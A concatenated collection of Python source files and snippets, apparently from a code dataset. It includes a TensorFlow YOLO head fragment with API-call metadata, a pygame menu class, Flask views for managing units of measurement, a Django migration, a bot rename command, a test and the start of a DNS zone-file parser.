)(feature_maps[2])
bbox_tensors.append(yolo_head_3[0])
prob_tensors.append(yolo_head_3[1])
predictions = FilterLayer(
input_size=tf.constant([cfg.INPUT_SIZE, cfg.INPUT_SIZE]),
score_threshold=0.2
)(bbox_tensors, prob_tensors)
return predictions
| [
"tensorflow.range",
"tensorflow.math.reduce_max",
"tensorflow.reshape",
"tensorflow.concat",
"tensorflow.constant",
"tensorflow.stack",
"tensorflow.cast",
"tensorflow.shape",
"tensorflow.exp",
"tensorflow.boolean_mask",
"tensorflow.split",
"tensorflow.sigmoid",
"tensorflow.expand_dims"
] | [((470, 564), 'tensorflow.reshape', 'tf.reshape', (['feature_map', '(batch_size, self.grid_size, self.grid_size, 3, 5 + self.classes)'], {}), '(feature_map, (batch_size, self.grid_size, self.grid_size, 3, 5 +\n self.classes))\n', (480, 564), True, 'import tensorflow as tf\n'), ((654, 709), 'tensorflow.split', 'tf.split', (['conv_output', '(2, 2, 1, self.classes)'], {'axis': '(-1)'}), '(conv_output, (2, 2, 1, self.classes), axis=-1)\n', (662, 709), True, 'import tensorflow as tf\n'), ((1044, 1072), 'tensorflow.cast', 'tf.cast', (['xy_grid', 'tf.float32'], {}), '(xy_grid, tf.float32)\n', (1051, 1072), True, 'import tensorflow as tf\n'), ((1100, 1119), 'tensorflow.sigmoid', 'tf.sigmoid', (['bbox_xy'], {}), '(bbox_xy)\n', (1110, 1119), True, 'import tensorflow as tf\n'), ((1153, 1179), 'tensorflow.sigmoid', 'tf.sigmoid', (['detection_conf'], {}), '(detection_conf)\n', (1163, 1179), True, 'import tensorflow as tf\n'), ((1211, 1235), 'tensorflow.sigmoid', 'tf.sigmoid', (['classes_prob'], {}), '(classes_prob)\n', (1221, 1235), True, 'import tensorflow as tf\n'), ((1508, 1558), 'tensorflow.concat', 'tf.concat', (['[prediction_xy, prediction_wh]'], {'axis': '(-1)'}), '([prediction_xy, prediction_wh], axis=-1)\n', (1517, 1558), True, 'import tensorflow as tf\n'), ((1658, 1706), 'tensorflow.reshape', 'tf.reshape', (['prediction_xywh', '(batch_size, -1, 4)'], {}), '(prediction_xywh, (batch_size, -1, 4))\n', (1668, 1706), True, 'import tensorflow as tf\n'), ((1733, 1792), 'tensorflow.reshape', 'tf.reshape', (['prediction_prob', '(batch_size, -1, self.classes)'], {}), '(prediction_prob, (batch_size, -1, self.classes))\n', (1743, 1792), True, 'import tensorflow as tf\n'), ((2230, 2263), 'tensorflow.concat', 'tf.concat', (['bounding_boxes'], {'axis': '(1)'}), '(bounding_boxes, axis=1)\n', (2239, 2263), True, 'import tensorflow as tf\n'), ((2281, 2306), 'tensorflow.concat', 'tf.concat', (['scores'], {'axis': '(1)'}), '(scores, axis=1)\n', (2290, 2306), True, 'import tensorflow as tf\n'), ((2328, 2363), 'tensorflow.math.reduce_max', 'tf.math.reduce_max', (['scores'], {'axis': '(-1)'}), '(scores, axis=-1)\n', (2346, 2363), True, 'import tensorflow as tf\n'), ((2432, 2469), 'tensorflow.boolean_mask', 'tf.boolean_mask', (['bounding_boxes', 'mask'], {}), '(bounding_boxes, mask)\n', (2447, 2469), True, 'import tensorflow as tf\n'), ((2490, 2519), 'tensorflow.boolean_mask', 'tf.boolean_mask', (['scores', 'mask'], {}), '(scores, mask)\n', (2505, 2519), True, 'import tensorflow as tf\n'), ((2784, 2822), 'tensorflow.split', 'tf.split', (['class_boxes', '(2, 2)'], {'axis': '(-1)'}), '(class_boxes, (2, 2), axis=-1)\n', (2792, 2822), True, 'import tensorflow as tf\n'), ((2845, 2882), 'tensorflow.cast', 'tf.cast', (['input_size'], {'dtype': 'tf.float32'}), '(input_size, dtype=tf.float32)\n', (2852, 2882), True, 'import tensorflow as tf\n'), ((3088, 3194), 'tensorflow.concat', 'tf.concat', (['[box_mins[..., 0:1], box_mins[..., 1:2], box_maxes[..., 0:1], box_maxes[...,\n 1:2]]'], {'axis': '(-1)'}), '([box_mins[..., 0:1], box_mins[..., 1:2], box_maxes[..., 0:1],\n box_maxes[..., 1:2]], axis=-1)\n', (3097, 3194), True, 'import tensorflow as tf\n'), ((3328, 3366), 'tensorflow.concat', 'tf.concat', (['[boxes, pred_conf]'], {'axis': '(-1)'}), '([boxes, pred_conf], axis=-1)\n', (3337, 3366), True, 'import tensorflow as tf\n'), ((423, 444), 'tensorflow.shape', 'tf.shape', (['feature_map'], {}), '(feature_map)\n', (431, 444), True, 'import tensorflow as tf\n'), ((776, 800), 'tensorflow.range', 'tf.range', (['self.grid_size'], 
{}), '(self.grid_size)\n', (784, 800), True, 'import tensorflow as tf\n'), ((802, 826), 'tensorflow.range', 'tf.range', (['self.grid_size'], {}), '(self.grid_size)\n', (810, 826), True, 'import tensorflow as tf\n'), ((870, 896), 'tensorflow.stack', 'tf.stack', (['xy_grid'], {'axis': '(-1)'}), '(xy_grid, axis=-1)\n', (878, 896), True, 'import tensorflow as tf\n'), ((945, 976), 'tensorflow.expand_dims', 'tf.expand_dims', (['xy_grid'], {'axis': '(0)'}), '(xy_grid, axis=0)\n', (959, 976), True, 'import tensorflow as tf\n'), ((1442, 1457), 'tensorflow.exp', 'tf.exp', (['bbox_wh'], {}), '(bbox_wh)\n', (1448, 1457), True, 'import tensorflow as tf\n'), ((5071, 5116), 'tensorflow.constant', 'tf.constant', (['[cfg.INPUT_SIZE, cfg.INPUT_SIZE]'], {}), '([cfg.INPUT_SIZE, cfg.INPUT_SIZE])\n', (5082, 5116), True, 'import tensorflow as tf\n'), ((2580, 2596), 'tensorflow.shape', 'tf.shape', (['scores'], {}), '(scores)\n', (2588, 2596), True, 'import tensorflow as tf\n'), ((2605, 2626), 'tensorflow.shape', 'tf.shape', (['class_boxes'], {}), '(class_boxes)\n', (2613, 2626), True, 'import tensorflow as tf\n'), ((2698, 2714), 'tensorflow.shape', 'tf.shape', (['scores'], {}), '(scores)\n', (2706, 2714), True, 'import tensorflow as tf\n'), ((2723, 2742), 'tensorflow.shape', 'tf.shape', (['pred_conf'], {}), '(pred_conf)\n', (2731, 2742), True, 'import tensorflow as tf\n')] |
"""
Author: <NAME>
File: menu.py
A general class for creating menus
Parameters:
pos - (x,y) position for the top-left corner of the menu
dims - (width, height) pixels of the menu
commands - list of dictionaries specifying the button attributes
padding - (horizontal, vertical) padding between border and buttons
spacing - space in pixels between buttons
color - rgb color of the menu background (None for transparent)
borderColor - rgb color value for border
borderWidth - pixel width for the border
    font - each button's font is supplied per command dictionary (via its "font" and "fontSize" keys)
orientation - "vertical" | "horizontal"
"""
import pygame
from polybius.graphics.components import Button
from polybius.graphics.basics.drawable import Drawable
from polybius.graphics.utils.window import Window
class Menu(Drawable, Window):
def __init__(self, pos, dims, commands, padding=0, spacing=0,
color=(80,80,80), borderColor=(0,0,0),
borderWidth=2, orientation="vertical"):
"""Initializes the menu"""
Drawable.__init__(self, "", pos, worldBound=False)
Window.__init__(self)
self._offset = (pos[0], pos[1])
self._width = dims[0]
self._height = dims[1]
h_padding = padding[0]
v_padding = padding[1]
self._borderColor = borderColor
self._borderWidth = borderWidth
self._backgroundColor = color
n = len(commands)
xStart = h_padding
yStart = v_padding
self._buttons = []
# Create buttons with a vertical configuration
if orientation == "vertical":
buttonWidth = self._width - (2*h_padding) - (2*borderWidth)
buttonHeight = (self._height - (2*v_padding) - \
((n-1)*spacing) - (2*borderWidth)) // n
for x, b in enumerate(commands):
font = pygame.font.SysFont(b["font"], b["fontSize"])
self._buttons.append((Button(b["text"],
(xStart + self._offset[0],
yStart + (x*buttonHeight) + \
(x*spacing) + self._offset[1]),
font, b["fontColor"], b["color"],
buttonHeight, buttonWidth, b["borderColor"],
b["borderWidth"]),
x+1, b["closeOnPress"], (b.get("toggleText",None),b["text"])))
# Create buttons with a horizontal configuration
elif orientation == "horizontal":
buttonWidth = (self._width - (2*h_padding) - \
((n-1)*spacing) - (2*borderWidth)) // n
buttonHeight = self._height - (2*v_padding) - (2*borderWidth)
for x, b in enumerate(commands):
font = pygame.font.SysFont(b["font"], b["fontSize"])
self._buttons.append((Button(b["text"],
(xStart + self._offset[0] +\
(x*buttonWidth) + (x*spacing),
yStart + self._offset[1]),
font, b["fontColor"], b["color"],
buttonHeight, buttonWidth, b["borderColor"],
b["borderWidth"]),
x+1, b["closeOnPress"], (b.get("toggleText",None),b["text"])))
self._selection = None
self.createDisplay()
def getButtonByText(self, text):
"""Return the button with the provided text"""
for button in self._buttons:
if button[0].getText() == text:
return button[0]
def getButtonByPosition(self, position):
"""Return the button at the given position in the menu"""
return self._buttons[position][0]
def handleEvent(self, event):
"""Handles events on the pause menu"""
for b in self._buttons:
b[0].handleEvent(event,self.select,(b,))
return self.getSelection()
def select(self, button):
"""Sets the current selection"""
b, selection, closeOnPress, toggleText = button
if closeOnPress:
self.close()
if toggleText[0] != None:
currentText = b._text
if toggleText[0] == currentText:
b.setText(toggleText[1])
else:
b.setText(toggleText[0])
self._selection = selection
def getSelection(self):
"""Returns the current selection and resets it to None"""
sel = self._selection
self._selection = None
return sel
def draw(self, screen):
"""Draws the menu on the screen"""
super().draw(screen)
# Draw buttons
for b in self._buttons:
b[0].draw(screen)
def createDisplay(self):
"""Create the display of the menu"""
# Draw the border
surfBack = pygame.Surface((self._width, self._height))
surfBack.fill(self._borderColor)
# Draw the background
surf = pygame.Surface((self._width - (self._borderWidth * 2),
self._height - (self._borderWidth * 2)))
# Apply the background color or make transparent
if self._backgroundColor == None:
surf.fill((1,1,1))
surfBack.set_colorkey((1,1,1))
else:
surf.fill(self._backgroundColor)
# Blit the widget layer onto the back surface
surfBack.blit(surf, (self._borderWidth, self._borderWidth))
self._image = surfBack
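# Illustrative usage sketch (assumes pygame and a display surface are already set up;
# the button attribute values below are made up for the example):
#   commands = [{"text": "Start", "font": "arial", "fontSize": 16, "fontColor": (255, 255, 255),
#                "color": (60, 60, 60), "borderColor": (0, 0, 0), "borderWidth": 1, "closeOnPress": True}]
#   menu = Menu((50, 50), (200, 60), commands, padding=(5, 5), spacing=4)
#   selection = menu.handleEvent(event)   # 1-based index of the pressed button, or None
#   menu.draw(screen)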
| [
"pygame.Surface",
"polybius.graphics.components.Button",
"pygame.font.SysFont",
"polybius.graphics.basics.drawable.Drawable.__init__",
"polybius.graphics.utils.window.Window.__init__"
] | [((1042, 1092), 'polybius.graphics.basics.drawable.Drawable.__init__', 'Drawable.__init__', (['self', '""""""', 'pos'], {'worldBound': '(False)'}), "(self, '', pos, worldBound=False)\n", (1059, 1092), False, 'from polybius.graphics.basics.drawable import Drawable\n'), ((1101, 1122), 'polybius.graphics.utils.window.Window.__init__', 'Window.__init__', (['self'], {}), '(self)\n', (1116, 1122), False, 'from polybius.graphics.utils.window import Window\n'), ((5079, 5122), 'pygame.Surface', 'pygame.Surface', (['(self._width, self._height)'], {}), '((self._width, self._height))\n', (5093, 5122), False, 'import pygame\n'), ((5210, 5306), 'pygame.Surface', 'pygame.Surface', (['(self._width - self._borderWidth * 2, self._height - self._borderWidth * 2)'], {}), '((self._width - self._borderWidth * 2, self._height - self.\n _borderWidth * 2))\n', (5224, 5306), False, 'import pygame\n'), ((1916, 1961), 'pygame.font.SysFont', 'pygame.font.SysFont', (["b['font']", "b['fontSize']"], {}), "(b['font'], b['fontSize'])\n", (1935, 1961), False, 'import pygame\n'), ((2923, 2968), 'pygame.font.SysFont', 'pygame.font.SysFont', (["b['font']", "b['fontSize']"], {}), "(b['font'], b['fontSize'])\n", (2942, 2968), False, 'import pygame\n'), ((2000, 2209), 'polybius.graphics.components.Button', 'Button', (["b['text']", '(xStart + self._offset[0], yStart + x * buttonHeight + x * spacing + self.\n _offset[1])', 'font', "b['fontColor']", "b['color']", 'buttonHeight', 'buttonWidth', "b['borderColor']", "b['borderWidth']"], {}), "(b['text'], (xStart + self._offset[0], yStart + x * buttonHeight + x *\n spacing + self._offset[1]), font, b['fontColor'], b['color'],\n buttonHeight, buttonWidth, b['borderColor'], b['borderWidth'])\n", (2006, 2209), False, 'from polybius.graphics.components import Button\n'), ((3007, 3215), 'polybius.graphics.components.Button', 'Button', (["b['text']", '(xStart + self._offset[0] + x * buttonWidth + x * spacing, yStart + self.\n _offset[1])', 'font', "b['fontColor']", "b['color']", 'buttonHeight', 'buttonWidth', "b['borderColor']", "b['borderWidth']"], {}), "(b['text'], (xStart + self._offset[0] + x * buttonWidth + x * spacing,\n yStart + self._offset[1]), font, b['fontColor'], b['color'],\n buttonHeight, buttonWidth, b['borderColor'], b['borderWidth'])\n", (3013, 3215), False, 'from polybius.graphics.components import Button\n')] |
from flask import flash, redirect, render_template, request, url_for
from flask_login import login_required
from sqlalchemy import and_
from . import unitOfMeasurements
from . forms import UnitOfMeasurementForm
from .. import db
from .. decorators import adminRequired
from .. models import UnitOfMeasurement
modelName = "Unit"
@unitOfMeasurements.route("/unitOfMeasurements", methods = ["GET", "POST"])
@login_required
@adminRequired
def listUnitOfMeasurements():
unitOfMeasurements = UnitOfMeasurement.query
return render_template("unitOfMeasurements/unitOfMeasurements.html", unitOfMeasurements = unitOfMeasurements)
@unitOfMeasurements.route("/units/add", methods = ["GET", "POST"])
@login_required
@adminRequired
def addUnitOfMeasurement():
operation = "Add"
form = UnitOfMeasurementForm()
# Add a new unit of measurement.
if form.validate_on_submit():
unitOfMeasurement = UnitOfMeasurement(Abbreviation = form.abbreviation.data, Name = form.name.data)
db.session.add(unitOfMeasurement)
db.session.commit()
flash("You have successfully added the new unit of measurement \"{}\".".format(unitOfMeasurement.Abbreviation), "alert alert-success")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
# Present a form to add a new unit of measurement.
breadcrumbs = [{"url" : url_for("unitOfMeasurements.listUnitOfMeasurements"), "text" : "<span class = \"glyphicon glyphicon-home\"></span>"}]
return render_template("addEdit.html", breadcrumbs = breadcrumbs, form = form, modelName = modelName, operation = operation)
@unitOfMeasurements.route("/units/addDefaultUnitsOfMeasurements", methods = ["GET", "POST"])
@login_required
@adminRequired
def addDefaultUnitsOfMeasurements():
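	# Seed the database with a standard set of brewing-related units, skipping any that already exist.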
defaultUnits = {"ASBC" : "american society of brewing chemists",
"ADF" : "apparent degree of fermentation",
"bbl" : "barrel",
"cells/ml" : "cells per milliliter",
"cells/ml/°P" : "cells per ml per degree plato",
"°C" : "degree celsius",
"°P" : "degree plato",
"°F" : "degree fahrenheit",
"°F/min" : "degree fahrenheit per minute",
"EBC" : "european brewery convention",
"gal" : "gallon",
"gpm" : "gallons per minute",
"g" : "grams",
"g/bbl" : "grams per barrel",
"g/L" : "grams per liter",
"h" : "hour",
"in" : "inches",
"IBU" : "international bittering unit",
"kg" : "kilogram",
"L" : "liters",
"mg" : "milligram",
"mL" : "milliliter",
"mm" : "millimeter",
"min" : "minute",
"ppb" : "parts per billion",
"ppm" : "parts per million",
"%" : "percentage",
"pH" : "potential of hydrogen",
"lb" : "pound",
"lb/bbl" : "pounds per barrel",
"psi" : "pounds per square inch",
"RDF" : "real degree of fermentation",
"RE" : "real extract",
"s" : "second",
"SG" : "specific gravity",
"SRM" : "standard reference method",
"t/h" : "tons per hour",
"TA" : "total acidity",
"vol" : "volumes",
"x10^12 cells" : "x10^12 cells",
"x10^6 cells" : "x10^6 cells"}
addedUnits = []
skippedUnits = []
for defaultUnit in defaultUnits:
unit = UnitOfMeasurement.query.filter(and_(UnitOfMeasurement.Abbreviation == defaultUnit,
UnitOfMeasurement.Name == defaultUnits[defaultUnit])).first()
if unit is None:
addedUnits.append(defaultUnits[defaultUnit])
unit = UnitOfMeasurement(Abbreviation = defaultUnit)
unit.Name = defaultUnits[defaultUnit]
db.session.add(unit)
else:
skippedUnits.append(defaultUnits[defaultUnit])
db.session.commit()
addedMessage = ""
alert = "alert alert-warning"
if addedUnits:
for unit in addedUnits:
if addedMessage == "":
addedMessage = "Added: {}".format(unit)
alert = "alert alert-success"
else:
addedMessage = "{}, {}".format(addedMessage, unit)
addedMessage = "{}.".format(addedMessage)
else:
addedMessage = "Added none of the default units of measurements."
flash(addedMessage, alert)
skippedMessage = ""
if skippedUnits:
for unit in skippedUnits:
if skippedMessage == "":
skippedMessage = "Skipped: {}".format(unit)
else:
skippedMessage = "{}, {}".format(skippedMessage, unit)
skippedMessage = "{} as they already exist.".format(skippedMessage)
flash(skippedMessage, "alert alert-warning")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
@unitOfMeasurements.route("/unitOfMeasurements/delete/<int:unitOfMeasurementId>", methods = ["GET", "POST"])
@login_required
@adminRequired
def deleteUnitOfMeasurement(unitOfMeasurementId):
unitOfMeasurement = UnitOfMeasurement.query.get_or_404(unitOfMeasurementId)
if unitOfMeasurement.isReferenced():
flash('Unit of Measurement "{}" is referenced by one or more element and/or event frame attribute template and/or tag and cannot be deleted.'. \
format(unitOfMeasurement.Abbreviation), "alert alert-danger")
else:
unitOfMeasurement.delete()
db.session.commit()
flash('You have successfully deleted the unit of measurement "' + unitOfMeasurement.Abbreviation + '".', "alert alert-success")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
@unitOfMeasurements.route("/unitOfMeasurements/edit/<int:unitOfMeasurementId>", methods = ["GET", "POST"])
@login_required
@adminRequired
def editUnitOfMeasurement(unitOfMeasurementId):
operation = "Edit"
unitOfMeasurement = UnitOfMeasurement.query.get_or_404(unitOfMeasurementId)
form = UnitOfMeasurementForm(obj = unitOfMeasurement)
# Edit an existing unit of measurement.
if form.validate_on_submit():
unitOfMeasurement.Abbreviation = form.abbreviation.data
unitOfMeasurement.Name = form.name.data
db.session.commit()
flash("You have successfully edited the unit of measurement \"{}\".".format(unitOfMeasurement.Abbreviation), "alert alert-success")
return redirect(url_for("unitOfMeasurements.listUnitOfMeasurements"))
# Present a form to edit an existing unit of measurement.
form.unitOfMeasurementId.data = unitOfMeasurement.UnitOfMeasurementId
form.abbreviation.data = unitOfMeasurement.Abbreviation
form.name.data = unitOfMeasurement.Name
breadcrumbs = [{"url" : url_for("unitOfMeasurements.listUnitOfMeasurements"), "text" : "<span class = \"glyphicon glyphicon-home\"></span>"},
{"url" : None, "text" : unitOfMeasurement.Name}]
return render_template("addEdit.html", breadcrumbs = breadcrumbs, form = form, modelName = modelName, operation = operation)
| [
"sqlalchemy.and_",
"flask.url_for",
"flask.flash",
"flask.render_template"
] | [((521, 625), 'flask.render_template', 'render_template', (['"""unitOfMeasurements/unitOfMeasurements.html"""'], {'unitOfMeasurements': 'unitOfMeasurements'}), "('unitOfMeasurements/unitOfMeasurements.html',\n unitOfMeasurements=unitOfMeasurements)\n", (536, 625), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((1442, 1555), 'flask.render_template', 'render_template', (['"""addEdit.html"""'], {'breadcrumbs': 'breadcrumbs', 'form': 'form', 'modelName': 'modelName', 'operation': 'operation'}), "('addEdit.html', breadcrumbs=breadcrumbs, form=form,\n modelName=modelName, operation=operation)\n", (1457, 1555), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((3828, 3854), 'flask.flash', 'flash', (['addedMessage', 'alert'], {}), '(addedMessage, alert)\n', (3833, 3854), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((6205, 6318), 'flask.render_template', 'render_template', (['"""addEdit.html"""'], {'breadcrumbs': 'breadcrumbs', 'form': 'form', 'modelName': 'modelName', 'operation': 'operation'}), "('addEdit.html', breadcrumbs=breadcrumbs, form=form,\n modelName=modelName, operation=operation)\n", (6220, 6318), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4139, 4183), 'flask.flash', 'flash', (['skippedMessage', '"""alert alert-warning"""'], {}), "(skippedMessage, 'alert alert-warning')\n", (4144, 4183), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4202, 4254), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (4209, 4254), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4834, 4965), 'flask.flash', 'flash', (['(\'You have successfully deleted the unit of measurement "\' +\n unitOfMeasurement.Abbreviation + \'".\')', '"""alert alert-success"""'], {}), '(\'You have successfully deleted the unit of measurement "\' +\n unitOfMeasurement.Abbreviation + \'".\', \'alert alert-success\')\n', (4839, 4965), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((4980, 5032), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (4987, 5032), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((1184, 1236), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (1191, 1236), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((1316, 1368), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (1323, 1368), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((5720, 5772), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (5727, 5772), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((6028, 6080), 'flask.url_for', 'url_for', (['"""unitOfMeasurements.listUnitOfMeasurements"""'], {}), "('unitOfMeasurements.listUnitOfMeasurements')\n", (6035, 6080), False, 'from flask import flash, redirect, render_template, request, url_for\n'), ((3062, 3170), 'sqlalchemy.and_', 'and_', (['(UnitOfMeasurement.Abbreviation == defaultUnit)', 
'(UnitOfMeasurement.Name == defaultUnits[defaultUnit])'], {}), '(UnitOfMeasurement.Abbreviation == defaultUnit, UnitOfMeasurement.Name ==\n defaultUnits[defaultUnit])\n', (3066, 3170), False, 'from sqlalchemy import and_\n')] |
from unittest import mock
import pytest
from bs4 import BeautifulSoup
from conf import wsgi
@pytest.mark.django_db
@pytest.mark.parametrize('script_name,prefix', (('/sso', '/sso/accounts/'), ('', '/accounts/')))
def test_set_script_name(rf, script_name, prefix):
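    # The prefix forwarded via HTTP_X_SCRIPT_NAME should show up in URLs rendered by the page (here, the sign-in link).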
environ = rf._base_environ(
PATH_INFO='/accounts/password/reset/',
CONTENT_TYPE="text/html; charset=utf-8",
REQUEST_METHOD="GET",
HTTP_X_SCRIPT_NAME=script_name,
)
response = wsgi.application(environ=environ, start_response=mock.Mock)
assert response.status_code == 200
soup = BeautifulSoup(response.content, 'html.parser')
element = soup.find(id='header-sign-in-link')
assert element.attrs['href'].startswith(prefix)
| [
"conf.wsgi.application",
"pytest.mark.parametrize",
"bs4.BeautifulSoup"
] | [((120, 219), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""script_name,prefix"""', "(('/sso', '/sso/accounts/'), ('', '/accounts/'))"], {}), "('script_name,prefix', (('/sso', '/sso/accounts/'),\n ('', '/accounts/')))\n", (143, 219), False, 'import pytest\n'), ((487, 546), 'conf.wsgi.application', 'wsgi.application', ([], {'environ': 'environ', 'start_response': 'mock.Mock'}), '(environ=environ, start_response=mock.Mock)\n', (503, 546), False, 'from conf import wsgi\n'), ((599, 645), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content', '"""html.parser"""'], {}), "(response.content, 'html.parser')\n", (612, 645), False, 'from bs4 import BeautifulSoup\n')] |
# Generated by Django 2.1.2 on 2018-11-04 16:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('game_catalog', '0010_auto_20181104_1036'),
]
operations = [
migrations.RemoveField(
model_name='publishedgame',
name='edition',
),
migrations.RemoveField(
model_name='publishedgame',
name='game_system',
),
migrations.RemoveField(
model_name='publishedgame',
name='isbn',
),
migrations.RemoveField(
model_name='publishedgame',
name='publisher',
),
]
| [
"django.db.migrations.RemoveField"
] | [((273, 339), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""edition"""'}), "(model_name='publishedgame', name='edition')\n", (295, 339), False, 'from django.db import migrations, models\n'), ((384, 454), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""game_system"""'}), "(model_name='publishedgame', name='game_system')\n", (406, 454), False, 'from django.db import migrations, models\n'), ((499, 562), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""isbn"""'}), "(model_name='publishedgame', name='isbn')\n", (521, 562), False, 'from django.db import migrations, models\n'), ((607, 675), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""publishedgame"""', 'name': '"""publisher"""'}), "(model_name='publishedgame', name='publisher')\n", (629, 675), False, 'from django.db import migrations, models\n')] |
import asyncio
from bashbot.commands import Command
from bashbot.commands.syntax import SyntaxBuilder
from bashbot.session_manager import SessionManager
class RenameCommand(Command):
def __init__(self):
super().__init__()
self.name = "Rename terminal"
self.aliases = [".rename"]
self.description = "Renames terminal session"
self.usage = ".rename <new_name>"
self.permission = "session.rename"
self.syntax = SyntaxBuilder() \
.param("new_name", "rename") \
.build()
async def rename(self, client, message, parameters):
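        # Rename the session bound to this channel; names longer than 20 characters are rejected.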
session = SessionManager.get_session(message.channel)
if session:
if not len(parameters["new_name"]) > 20:
session.name = parameters["new_name"]
else:
await client.send_message(message.channel, ":no_entry_sign: Maximum length of session name is 20. Your is: %s" % len(parameters["name"]))
return
session.send_output(asyncio.get_event_loop())
else:
await client.send_message(message.channel, ":no_entry_sign: You are trying to freeze non-existing session")
| [
"bashbot.session_manager.SessionManager.get_session",
"asyncio.get_event_loop",
"bashbot.commands.syntax.SyntaxBuilder"
] | [((627, 670), 'bashbot.session_manager.SessionManager.get_session', 'SessionManager.get_session', (['message.channel'], {}), '(message.channel)\n', (653, 670), False, 'from bashbot.session_manager import SessionManager\n'), ((1027, 1051), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (1049, 1051), False, 'import asyncio\n'), ((473, 488), 'bashbot.commands.syntax.SyntaxBuilder', 'SyntaxBuilder', ([], {}), '()\n', (486, 488), False, 'from bashbot.commands.syntax import SyntaxBuilder\n')] |
import os, sys
if __name__ == "__main__":
negative_identity_weight = [0, 0, 0]
positive_identity_weight = [0, 0, 0]
negative_classes_weight = [0, 0, 0]
positive_classes_weight = [0, 0, 0]
negative_policy_weight = [0, 0, 0]
positive_policy_weight = [0, 0, 0]
for i in range(len(negative_identity_weight)):
log = f'log/cifar10/icpkd/resnet18_from_resnet50_option_1_{i}_2倍.txt'
os.system("rm -rf ./resource")
os.system(f"python ./SST/image_classification_policy.py --log {log}")
print(f"============================end {i}================================") | [
"os.system"
] | [((421, 451), 'os.system', 'os.system', (['"""rm -rf ./resource"""'], {}), "('rm -rf ./resource')\n", (430, 451), False, 'import os, sys\n'), ((460, 529), 'os.system', 'os.system', (['f"""python ./SST/image_classification_policy.py --log {log}"""'], {}), "(f'python ./SST/image_classification_policy.py --log {log}')\n", (469, 529), False, 'import os, sys\n')] |
#!/usr/bin/env python3
"""
Limits:
- can't read brackets in brackets
- avoid using more than one bracket per line; normally it should work, but use it carefully
- problems distinguishing TTL from domain, if domain[:-1].isdigit()"""
VERSION = 1.1
DOMAIN_MAX_LENGHT = 255
CLASSES = ["IN", "HS", "CH", "CS"]
RRsTYPES = ["A","AAAA", "A6", "AFSDB", "APL", "CERT", "CNAME", "DHCID", "DNAME",
"DNSKEY", "DS", "GPOS", "HINFO", "IPSECKEY", "ISDN", "KEY", "KX", "LOC",
"MX", "NAPTR", "NSAP", "NS", "NSEC", "NSEC3","NSEC3PARAM", "NXT", "PTR",
"PX", "RP", "PRSIG", "RT", "SIG", "SOA", "SPF", "SRV", "SSHFP", "TXT", "WKS", "X25"]
from time import strftime
class ZoneFileError(Exception):
"""Simple Exception handler"""
def __init__(self, error, file):
self.error = str(error)
self.file = str(file)
def __str__(self):
return """Please check the given zone file {0}.\nFollowing Error occured: {1}""".format(self.file, self.error)
class _Parser():
"""Main Parser"""
def __init__(self, file):
self.file = file
self.zone = list()
self.Table = list() # format: [primKey, name, ttl, class, type, value]
self.stream = open(file)
self.zone_org = self.stream.read()
self.stream.close()
self.zone = self.zone_org.splitlines()
self.rmComment()
self.rmCompleteParanthese()
self.split()
self.cleanUp()
self.parse()
def error(self, error):
"""returns error"""
raise ZoneFileError(error, self.file)
def getIndexe(self, pattern):
"""return every index of fitting patter"""
self.counter = 0
self.result = list()
for i in range(self.zone_org.count(pattern)):
self.result.append(self.zone_org.find(pattern, self.counter))
self.counter = self.result[-1] + 1
return self.result
def rmComment(self):
"""Removes comments from zone (;, #, /**/, //)"""
if ";" in self.zone_org: self.zone = [i.split(";")[0] for i in self.zone if i != ";"]
if "#" in self.zone_org: self.zone = [i.split("#")[0] for i in self.zone if i != "#"]
if "//" in self.zone_org: self.zone = [i.split("//")[0] for i in self.zone if i != "//"]
if "/*" in self.zone_org:
self.pop = list()
self.counter = False
for i in range(len(self.zone)):
if "/*" in self.zone[i]:
self.counter = True
self.zone[i] = self.zone[i].split("/*")[0]
continue
if "*/" in self.zone[i]:
                    self.pop.append(i) # warning: complete line is removed. Problem with: /*comment\nbla\nbla*/command?
self.counter = False
continue
if self.counter:
self.pop.append(i)
            self.pop.sort(reverse = True) # To avoid collapse of mapping
for i in self.pop:
self.zone.pop(i)
def move(self, index):
"""Merge index + 1 with index."""
self.zone[index] += " " + self.zone[index + 1]
self.zone.pop(index + 1)
def rmParanthese(self):
"""removes paranthes if closed from zone file line"""
self.zone = [self.zone[i].replace("(", "").replace(")", "") if self.zone[i].count("(") == self.zone[i].count(")") else self.zone[i] for i in range(len(self.zone))]
def mergeParanthese(self):
"""Merge every paranthes to one line"""
self.paranthese = 0
self.subt = 0
